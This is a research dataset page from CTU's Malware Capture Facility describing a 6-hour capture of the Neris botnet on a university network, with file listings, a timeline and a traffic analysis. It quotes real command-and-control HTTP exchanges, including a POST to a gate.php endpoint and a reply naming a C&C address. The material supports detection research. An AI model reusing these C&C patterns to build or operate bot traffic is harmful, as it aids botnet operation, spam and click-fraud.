MCFP - ATG - CTU University
Malware Capture  facility project
  • Home
  • MCFP Dataset
    • CTU-Malware-Capture-Botnet-42
    • The CTU-13 Dataset. A Labeled Dataset with Botnet, Normal and Background traffic.
  • Analysis
  • About
  • Topology and Tools
  • Papers

  1. CTU-Malware-Capture-Botnet-42

CTU-Malware-Capture-Botnet-42

info

  • Binary used: Neris.exe
  • Md5: bf08e6b02e00d2bc6dd493e93e69872f
  • Probable Name: Neris
  • Capture duration: 6.15 hours
  • Complete Pcap size: 52GB
  • Botnet Pcap size: 56MB
  • NetFlow size: 369MB
  • Infected Virtual Environment
  •      Windows XP named 'SARUMAN'
  •      IP address: 147.32.84.165
  •      Label of this IP in the NetFlows files: 'Botnet'

files

pcap files

  • capture20110810.pcap
    This is the main capture file that includes the Background, Normal and Botnet traffic.
  • botnet-capture-20110810-neris.pcap
    This file was obtained at the same time that the capture20110810.pcap file, but only capturing the botnet traffic. The idea is to have a separate file with all the payload that can be published.

netflow files

  • capture20110810.pcap.netflow.labeled (Temporary broken)
    This file has the unidirectional NetFlows generated by Argus.
  • capture20110810.pcap.netflow.labeled
    This file contains the bidirectional NetFlows generated by Argus. 

timeline

  • Wed ago 10 15:58:00 CEST 2011

We captured the neris bot along with the packets of the whole CTU department. The first hour of capture was composed of only Background traffic and latter we run the malware. The malware was stopped 5 minutes before ending the capture. We limited the bandwith of the experiment to 20kbps in the output of the bot.

traffic analysis

This dataset corresponds to a Neris botnet that run for 6.15 hours in a University network. The botnet used an HTTP based C&C channel and not an IRC C&C channel as it was erroneously reported before. The actions of the botnet were to communicate using several C&C channels and then to try to send SPAM, to actually send SPAM and perform click-fraud using some advertisement services.

The following connection is an example of a real C&C channel that sent few flows and that is not periodic. This is not a good representative model for C&C connections. An example of the commands sent are:

POST /?c799959d9582d499959791949482d19995939782d2999790969182c699959c949c92
959c82c0999582d79995969c959d9d9482c199e79ef8f3edeae0ebf3f7f8f0e1e9f4f893ccd
dddcccad3c28ac1dcc182c399cdcacdd0a4 HTTP/1.1
HTTP/1.1 200 OK
Date: Wed, 10 Aug 2011 09:41:53 GMT
Server: Apache/2.2.8 (Fedora) DAV/2 PHP/5.2.6 mod\_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8
CB2=212.117.171.138:65500


The following connection is a not encrypted C&C were we can see the commands, and it is a good representative of the C&C connections. 

POST /snapbn/gate.php HTTP/1.0
Host: finalcortex.com
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
id=SARUMAN_610d402662842e9f&version=1337&os=2600&s5=6906


HTTP/1.1 200 OK
Date: Wed, 10 Aug 2011 09:08:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 3
Connection: close
Content-Type: text/plain; charset=UTF-8

120




Download of all the files

CTU-Malware-Capture-Botnet-42
Powered by Create your own unique website with customizable templates.